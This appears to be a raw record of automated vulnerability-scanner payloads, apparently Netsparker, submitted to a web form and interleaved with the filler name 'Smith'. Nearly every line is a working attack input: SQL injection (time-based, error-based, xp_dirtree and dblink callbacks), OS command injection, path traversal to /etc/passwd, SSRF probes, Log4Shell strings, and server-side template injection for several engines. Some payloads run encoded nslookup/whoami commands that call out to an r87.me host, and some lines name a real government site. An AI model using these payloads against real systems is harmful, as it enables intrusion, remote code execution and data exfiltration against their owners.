5993 Smith
5994
5995
5996
5997
5998 Smith & SET /A 0xFFF9999-70471 &
5999 Smith
6000 Smith
6001 Smith
6002 Smith
6003 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||c
6004
6005 Smith
6006 Smith file%3a%2f%2f%2fboot.ini
6007 Smith
6008
6009 Smith /../../../../../../../../../../web.config
6010 Smith
6011
6012
6013 Smith '||'1'=='2
6014
6015
6016
6017 ";expr 268409241 - 68355;"
6018 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)
6019 Smith
6020
6021
6022 Smith
6023 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
6024
6025
6026 | SET /A 0xFFF9999-23749
6027 Smith
6028 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
6029 Smith
6030 Smith
6031 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHA
6032 Smith
6033 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
6034 Smith
6035
6036
6037 =268409241-73677
6038 Smith
6039
6040 Smith
6041
6042
6043
6044 Smith '||'N'=='3
6045
6046 Smith '||true||'
6047
6048 Smith
6049
6050
6051 {php}print(int)0xFFF9999-42990;{/php}
6052 Smith
6053
6054 Smith 127.0.0.1/trace.axd
6055 Smith
6056 Smith
6057 Smith
6058 Smith
6059
6060 Smith ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
6061 NS09
6062
6063
6064
6065 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
6066 Smith
6067 Smith
6068
6069 print localtime()*0+0xFFF9999-45547
6070 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
6071
6072 Smith
6073
6074 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109)
6075
6076 /../../../../../../../../../../etc/httpd/logs/error.log
6077 Smith
6078 Smith
6079
6080 Smith
6081 Smith
6082 Smith
6083 Smith
6084 <%- 268409241-79622 %>
6085 [::1]/elmah.axd
6086
6087
6088
6089 arguments[1].end(require('child_process').execSync('expr 268409241 - 9379'))
6090 Smith WAITFOR DELAY '0:0:25'-- /* f2a5f0b7-c303-4457-b00c-c6854ef3fd2d */
6091
6092 ;expr 268409241 - 8098;x
6093
6094 ' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101
6095 Smith
6096 Smith
6097 propertytax.jk.gov.in/elmah
6098 tbiqvedsq6c0psqonpxhqe_hdgwcazivinvexnhhqc7.r87.me/p/
6099 Smith ";expr 268409241 - 85390;"
6100 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
6101
6102 Smith =268409241-10933
6103 Smith
6104 Smith
6105
6106 Smith
6107 Smith https://propertytax.jk.gov.in/elmah
6108
6109 Smith
6110 ') WAITFOR DELAY '0:0:25'-- /* 49ce8dab-af74-47fc-a401-edce852cbefd */
6111 ';l=document.createElement("link");l.rel="prefetch";l.href="//tbiqvedsq6whe0kjp6pphyxpvxebzalfgspaav
6112 ';sleep(25000);ns();' /* 54304d8e-6fb2-42e5-a576-a481edcaec2a */
6113 Smith
6114 ';l=document.createElement("link");l.rel="prefetch";l.href="//tbiqvedsq6ddorb6predxhyowkw44o8tp-dv1d
6115 Smith
6116 Smith ${j${env:bmV0c3Bhcmtlcg:-n}di:dns://tbiqvedsq6${lower:v}pnzbk3iflym13b4y9l02tm_z6ikmukpu.r87.me}
6117
6118 Smith
6119
6120 arguments[1].end(require('child_process').execSync('expr 268409241 - 15559'))
6121 Smith
6122 Smith "& SET /A 0xFFF9999-92070 &
6123
6124 Smith
6125 Smith
6126 expr 268409241 - 75338;
6127 javascript:netsparker(0x052215)
6128 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109)
6129
6130 ') WAITFOR DELAY '0:0:1'-- /* ed91c0f4-37f0-4085-82d8-b2777b8c959d */
6131 SET /A 0xFFF9999-59637 &
6132 arguments[1].end(require('child_process').execSync('set /A 268409241 - 64188'))
6133
6134 Smith
6135
6136
6137
6138 Smith
6139 Smith
6140
6141 Smith
6142 Smith
6143
6144 Smith
6145 p "#{0xFFF9999.to_i-`echo 53556`.to_i}"
6146
6147
6148
6149 ') WAITFOR DELAY '0:0:1'-- /* 92f1d1c0-fc67-43d9-bb1c-afb8b85c349f */
6150 Smith
6151 Smith
6152 %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-54186)}
6153 p "#{0xFFF9999.to_i-`echo 9115`.to_i}"
6154
6155 ') WAITFOR DELAY '0:0:1'-- /* 92f1d1c0-fc67-43d9-bb1c-afb8b85c349f */
6156
6157 __import__('os').popen(('SET /A 268409241 - {0}').format('31723')).read()
6158
6159
6160 <%= "#{268409241-56576}" %>
6161 /../../../../../../../../../../etc/httpd/logs/error_log
6162 gethostbyname(trim('tbiqvedsq6e_rllzghpp_xjxdg-qdgvkenv4wioc'.'nvq.r87.me'))
6163 Smith
6164
6165
6166 Smith <%= "#{268409241-58193}" %>
6167 Smith
6168
6169
6170 Smith
6171 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)
6172 Smith propertytax.jk.gov.in/elmah
6173 Smith '{${gethostbyname(trim('tbiqvedsq66rg_p-d3rlou3a7twir5hluie4lgv-'.'fmk.r87.me'))}}'
6174 127.100.11.2/elmah
6175
6176
6177 Smith
6178 Smith
6179 "+netsparker(0x052398)+"
6180 '{${gethostbyname(trim('tbiqvedsq6t9fbyxkkw1hzvvvk63ur_tc83ctkoh'.'asy.r87.me'))}}'
6181
6182 /../../../../../../../../../../proc/version
6183 NSFTW
6184
6185 expr 268409241 - 72795;
6186
6187 Smith
6188 Smith
6189
6190
6191 expr 268409241 - 65603
6192
6193 Smith
6194 %27
6195
6196 Smith
6197 Smith nslookup "tbiqvedsq6vw0y5dk8l-zgbidhbqefq7t1emm5ej""yui.r87.me"
6198 //r87.com/n/j/?0x052754
6199 Smith
6200 Smith
6201 '& ping -n 25 127.0.0.1 &
6202 Smith
6203 https://propertytax.jk.gov.in/trace.axd
6204 ;netsparker(0x05275A)//\
6205 Smith
6206
6207
6208 "+print localtime()*0+0xFFF9999-39346+"
6209 Smith
6210 ping -n 25 127.0.0.1 &
6211 Smith
6212 http://[::1]:22
6213 Smith
6214 |nslookup${IFS}"tbiqvedsq6x52dwm_ikge54eujaf8f8t3ldhbhba""rsq.r87.me"
6215 "+print localtime()*0+0xFFF9999-94813+"
6216
6217
6218 ping -n 1 127.0.0.1 &
6219 -1';exec('xp_dirtree ''\\tbiqvedsq6twegjujdyv1hilnlwvz-cyzod-dohn'+'p88.r87.me'+'\c$\a''')--
6220 '&nslookup "tbiqvedsq6xjl5tdngfwcpjotrcznm0zyyvufly7""wlm.r87.me"
6221 Smith
6222 ping -n 1 127.0.0.1 &
6223
6224 Smith
6225 Smith
6226 -1';exec('xp_dirtree ''\\tbiqvedsq67lmhf9ypl6zajnkyo6-8hbupm3_p7k'+'wpc.r87.me'+'\c$\a''')--
6227 Smith
6228 Smith
6229
6230 Smith
6231 Smith
6232
6233 Smith ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* f934c062-ae54-47dd-b32a-20cd1a37f500 */
6234
6235 Smith
6236 Smith
6237 '+netsparker(0x05290B)+'
6238 Smith
6239 '+NSFTW+'
6240 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."tbiqvedsq6i4ueql0h6jalx7exdovsvl6xn8opsp""fa8.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})
6241 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
6242 netsparker(0x05293D)
6243
6244 Smith
6245 arguments[1].end(require('child_process').execSync('expr 268409241 - 80548'))
6246
6247 Smith
6248 ping -n 25 127.0.0.1 &
6249 Smith %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."tbiqvedsq6yj9m58g4eewnrchnafdj4dl0csvlx_""faa.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})
6250
6251 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 84467d42-f677-4d98-9c11-52dd91a0c272 */
6252
6253
6254 Smith
6255 Smith
6256 Smith /../../../../../../../../../../../etc/passwd
6257 ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
6258 Smith
6259 Smith
6260 Smith
6261 Smith
6262 1')exec('xp_dirtree ''\\tbiqvedsq6mer3ehdxp2aojvqgoukfgo_t6zwjfo'+'snu.r87.me'+'\c$\a''')--
6263 https://metadata.platformequinix.com/metadata
6264 Smith
6265
6266
6267 Smith https://metadata.platformequinix.com/metadata
6268 Smith
6269 Smith
6270 Smith
6271 "&ping -w 25 127.0.0.1 &"
6272 "&nslookup "tbiqvedsq6zrdkfn0n_moasltxh16qwgyvjfq_yf""xh8.r87.me"
6273 Smith
6274 Smith response.write(268409241-76039)'
6275 response.write(268409241-74464)'
6276 %22%2bnetsparker(0x0529C1)%2b%22
6277 "&ping -w 1 127.0.0.1 &"
6278 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||
6279
6280 Smith %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "tbiqvedsq6falzvj1cie2jpww70ljvhl4h20tp97"m58.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redire
6281
6282 +response.write(268409241-79080)'
6283 <% response.write(268409241-56727) %>
6284 https://propertytax.jk.gov.in/trace.axd
6285 Smith "+response.write(268409241-46353)+"
6286 1))exec('xp_dirtree ''\\tbiqvedsq6bsqpsfsoaymqyyaolbos0kck_r_jlb'+'vt8.r87.me'+'\c$\a''')--
6287 propertytax.jk.gov.in/trace.axd
6288 Smith
6289
6290 "+response.write(268409241-39353)+"
6291 %22%2bnetsparker(0x0529C2)%2b%22
6292 Smith %27
6293 Smith
6294 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
6295 Smith +response.write(268409241-38701)'
6296 Smith
6297 "&ping -w 1 127.0.0.1 &"
6298 Smith {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNjhuZXVobGNrcXE1ejJpNnFmYWxwcXZrZjB0a3lkYmE3aS5yODcubWU=')).read()}}
6299 "&ping -w 1 127.0.0.1 &"
6300 "&ping -w 30 127.0.0.1 &"
6301
6302 arguments[1].end(require('child_process').execSync('expr 268409241 - 84924'))
6303
6304 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnZEdKcGNYWmxaSE54Tm10d2FYWnRibkJtWW5WdGJYbHlabUYyZVhZNGEzZGtlR3N6ZHpsaWJ6TndiUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %
6305 ping -n 25 127.0.0.1 &
6306 "&nslookup "tbiqvedsq6yozqbugro7wdddhjf5xelvsa8csdgr""xrc.r87.me"
6307 1'))exec('xp_dirtree ''\\tbiqvedsq6yiu-x5x3t-kn_sog7o3n6uywpppdsf'+'upm.r87.me'+'\c$\a''')--
6308 Smith
6309 "&ping -w 30 127.0.0.1 &"
6310 Smith
6311 Smith {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnZEdKcGNYWmxaSE54Tm5SNU0yZzVhR05wZG5OamEySjJkVE16Wm1waGMyazBkRzFyWVhsbWFXTmxZUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %
6312 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNndqY2N6NWhiY3hoZ25oZTFiaGUxcHdnaTZseWZvd3Jydy5yODcubWU=','base64').toString())
6313
6314
6315 Smith
6316
6317 Smith
6318 Smith
6319 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||
6320 "&ping -w 25 127.0.0.1 &"
6321 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 7e05f9a5-f233-40e9-9521-bf841f101dea */
6322 Smith ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
6323 Smith = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNmUxb2djNDJ2emk0dmJhZ2JxMnplZmJvYXlvOXJ3NmNlMC5yODcubWU=','base64').toString())
6324 //r87.com/?0x052B5B
6325 |nslookup${IFS}"tbiqvedsq6gc--t0g1_fgj_cx0tkis4_wkvue7d1""uxo.r87.me"
6326 1'))exec('xp_dirtree ''\\tbiqvedsq6vfw0qgszvtaensdv5mpm0dd0jt_7n9'+'sse.r87.me'+'\c$\a''')--
6327 Smith
6328
6329 "&ping -w 25 127.0.0.1 &"
6330 Smith <% response.write(268409241-71099) %>
6331 Smith
6332 arguments[1].end(require('child_process').execSync('set /A 268409241 - 61445'))
6333 Smith
6334 arguments[1].end(require('child_process').execSync('set /A 268409241 - 11209'))
6335 Smith
6336 Smith
6337 Smith
6338 Smith
6339 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
6340 print(int)0xFFF9999-46928
6341
6342 Smith
6343 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNnFkb3picmprYmx2LXZvbXVoZWkzZ2VqeGRlc3JxbnN1cy5yODcubWU=','base64').toString()) %>
6344 "&ping -w 25 127.0.0.1 &"
6345 '&ping -w 25 127.0.0.1 &'
6346 |nslookup${IFS}"tbiqvedsq6fuf1ffwnhvhbnoz0xs7jc64exxdjq6""xam.r87.me"
6347 //r87.com/?0x052B67
6348
6349 syscolumns WHERE 2>3;exec('xp_dirtree ''\\tbiqvedsq6save9k0y9knljuzivu7qxf0jun0omz'+'11i.r87.me'+'\c
6350
6351
6352 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 70874a14-3947-4a0f-8422-b72b3cbd21d2 */
6353 propertytax.jk.gov.in/trace.axd
6354 164.100.223.17/trace.axd
6355 Smith <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNm1teXhpYng1aW9ncHVsY3Nsay1uamd1azlqbHNncnBqby5yODcubWU=','base64').toString()) %>
6356 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
6357
6358 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
6359 Smith print(int)0xFFF9999-4770
6360 '&ping -w 25 127.0.0.1 &'
6361 %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-80434)}
6362 '&ping -w 25 127.0.0.1 &'
6363 Smith
6364 syscolumns WHERE 2>3;exec('xp_dirtree ''\\tbiqvedsq6dkoohghqkdnuhdu30kd1laygc2z3qp'+'t-y.r87.me'+'\c
6365 '&ping -w 1 127.0.0.1 &'
6366 '&ping -w 1 127.0.0.1 &'
6367 '&ping -w 30 127.0.0.1 &'
6368 '&ping -w 30 127.0.0.1 &'
6369 Smith
6370 Smith
6371 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
6372 ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
6373 {php}Smarty_Resource::parseResourceName(system("nslookup tbiqvedsq6iekbbroaopxq0cmfpmj0f3xytouufa"."e8m.r87.me"),'b');{/php}
6374 Smith
6375 Smith
6376 Smith
6377 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%
6378 '&ping -w 25 127.0.0.1 &'
6379 &ping -w 25 127.0.0.1 &
6380
6381
6382
6383
6384 &ping -w 1 127.0.0.1 &
6385
6386 &ping -w 1 127.0.0.1 &
6387 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
6388 Smith -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* f2137008-5b15-414d-bd44-06ba5f5d2ed0 */
6389 &ping -w 1 127.0.0.1 &
6390 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%
6391 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
6392 &ping -w 25 127.0.0.1 &
6393
6394
6395 Smith
6396 Smith
6397 DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';
6398 164.100.223.17/trace.axd
6399 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 2d11c878-9bf0-4537-be0f-dbb141e144c0 */
6400 print(int)0xFFF9999-36544;
6401 Smith {php}Smarty_Resource::parseResourceName(system("nslookup tbiqvedsq602gqqpul_eaezerbyfgf3pyyhtx1kq"."qji.r87.me"),'b');{/php}
6402 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
6403
6404 &ping -w 25 127.0.0.1 &
6405 Smith ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
6406
6407
6408 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
6409
6410 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
6411 Smith
6412 Smith print(int)0xFFF9999-78640;
6413 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup tbiqvedsq6cqbb2-tgucgfukxg9whbscp4vzdyjg"~"wp0.r87.me")}}
6414 Smith {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup tbiqvedsq6pjvgf6ajbqwngxypxnu1fv1od0ffyf"~"aqy.r87.me")}}
6415 Smith
6416 127.100.11.2/trace.axd
6417 &ping -w 25 127.0.0.1 &
6418 &ping -w 1 127.0.0.1 &
6419 &ping -w 1 127.0.0.1 &
6420
6421 &ping -w 30 127.0.0.1 &
6422
6423 Smith
6424
6425 Smith
6426 DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';
6427
6428
6429 %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-36396)}
6430 &ping -w 30 127.0.0.1 &
6431
6432
6433 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 26d4b140-0ea7-45b8-9a7c-ecaabc653efd */
6434 +print(int)0xFFF9999-71477;//
6435 Smith (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
6436 p "#{0xFFF9999.to_i-`echo 93465`.to_i}"
6437 Smith
6438 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'
6439 Smith
6440 {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNnVoejJvOXR
6441 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 2e4a4d2a-e476-4255-a77e-192bf8e82147 */
6442 ping -w 25 127.0.0.1 &
6443
6444 ' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101
6445 ' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101
6446
6447 .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
6448 Smith .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
6449 127.100.11.2/trace.axd
6450 Smith +print(int)0xFFF9999-68161;//
6451 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
6452 Smith
6453 Smith
6454 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgdGJpcXZlZHNxNnZqbGdwZThmM2JxMHN1c3l0b3JvdnVzOS14eG5id3lfdS5yODcubWU=')})).to_s}" %>
6455 {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNnVwMXNmY3p
6456
6457 Smith
6458 //r87.com/n/j/?0x052D85
6459
6460 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'
6461
6462 ping -w 25 127.0.0.1 &
6463 Smith '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
6464 ping -w 1 127.0.0.1 &
6465
6466 ping -w 1 127.0.0.1 &
6467 ping -w 30 127.0.0.1 &
6468 ping -w 30 127.0.0.1 &
6469 127.0.0.1/trace.axd
6470 -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''
6471 //r87.com/n/j/?0x052D86
6472
6473 . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
6474 ping -w 25 127.0.0.1 &
6475 Smith <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgdGJpcXZlZHNxNm1idTN5Y24wOGZqOC1wem9uamNqLXJ1YzRxYmJmaThzOC5yODcubWU=')})).to_s}" %>
6476 Smith
6477 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9
6478 Smith
6479
6480 Smith
6481 Smith ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* db47016c-fc18-4e93-afd4-75eb872329a1 */
6482
6483 Smith
6484 '+print(int)0xFFF9999-27573+'
6485
6486 convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
6487 Smith
6488 ping -w 25 127.0.0.1 &
6489 127.0.0.1/trace.axd
6490 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9
6491
6492 Smith
6493 p "#{0xFFF9999.to_i-`echo 83897`.to_i}"
6494 Smith . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
6495 /../../../../../../../../../../../etc/passwd
6496 Smith
6497 ping -n 25 127.0.0.1
6498 -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''
6499 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNnB5Zm
6500
6501 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq60hfteck8fjkyo_72smjr9jdmbg_tkd"+"1ce.r87.me") }
6502 __import__('os').popen(('expr 268409241 - {0}').format('86792')).read()
6503 Smith
6504
6505 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 2962880a-1b84-4870-ac3f-e5caebd046c8 */
6506 Smith
6507 \";netsparker(0x052EE5);///
6508
6509
6510
6511 ping -n 25 127.0.0.1
6512 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNmw4cn
6513 SELECT dblink_connect('host=tbiqvedsq65dn-73suj3wpit4pklaksj2mu-p94o'||'rom.r87.me user=a password=a
6514 [::1]/trace.axd
6515 Smith /../../../../../../../../../../../etc/passwd
6516 Smith
6517
6518
6519 Smith <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq6h5dsfqlcrypyf53xpyuw_nlv3au7rq"+"4wm.r87.me") }
6520
6521 SELECT dblink_connect('host=tbiqvedsq6ynjredwhr5srakl797dnr1arz_osb_'||'mwi.r87.me user=a password=a
6522 Smith 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 3893605b-d47c-4b6a-a768-6bfb9a573a47 */
6523 Smith
6524 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNmg2
6525 ping -n 25 127.0.0.1
6526 ping -n 25 127.0.0.1
6527 Smith '+print(int)0xFFF9999-92605+'
6528 "+print(int)0xFFF9999-87110+"
6529 Smith
6530 Smith
6531 Smith
6532 require 'resolv';Resolv.getaddress ("tbiqvedsq6akzim4evn4wuhpcydy-tqvzzwbfmit".concat "cyi.r87.me")
6533
6534 __import__('os').popen(('expr 268409241 - {0}').format('95606')).read()
6535 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNmpu
6536
6537
6538 Smith
6539 dblink_connect('host=tbiqvedsq6lg5andrrllu1lh7ceakorlfnvccyud'||'ctu.r87.me user=a password=a connec
6540 ping -w 25 127.0.0.1
6541 ping -w 25 127.0.0.1
6542
6543
6544 Smith convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
6545 Smith
6546
6547
6548 Smith "+print(int)0xFFF9999-81975+"
6549 Smith
6550 Smith require 'resolv';Resolv.getaddress ("tbiqvedsq6a5ld3hitvuthizrh-mjg3wzz-3oq9b".concat "rxe.r87.me")
6551 Smith
6552 Smith
6553
6554 dblink_connect('host=tbiqvedsq6oa8ssd3a-kdgvupvny4on58slhcjfh'||'d2u.r87.me user=a password=a connec
6555
6556 Smith
6557
6558 /etc/passwd
6559 Smith /etc/passwd
6560 __import__('os').popen(('SET /A 268409241 - {0}').format('68500')).read()
6561 ping -w 25 127.0.0.1
6562
6563
6564 Smith
6565 {php}Smarty_Resource::parseResourceName(system("nslookup tbiqvedsq6ujou4xeqgg56_kwbljd2sgbfkiv4nr"."
6566 [::1]/trace.axd
6567 {php}Smarty_Resource::parseResourceName(system("nslookup tbiqvedsq63-k8e4wsdkwbp-ae02yybnvnjqz0-5"."
6568
6569 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup tbiqvedsq6st2
6570 Smith
6571 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNmprbWhndHZ3ZWcxbmljNjR1YWM4NXVqaV92dXlfeHlpZy5yODcubWU=')).read()
6572 ;netsparker(0x052F7A)//\
6573
6574 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
6575
6576
6577
6578
6579
6580
6581 cast((SELECT dblink_connect('host=tbiqvedsq665jixc9wvlx5ue7ug86p7z3oki5lpg'||'5xa.r87.me user=a pass
6582 ping -w 25 127.0.0.1
6583
6584 {php}print(int)0xFFF9999-88620;{/php}
6585 Smith
6586 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup tbiqvedsq6_hp
6587 Smith
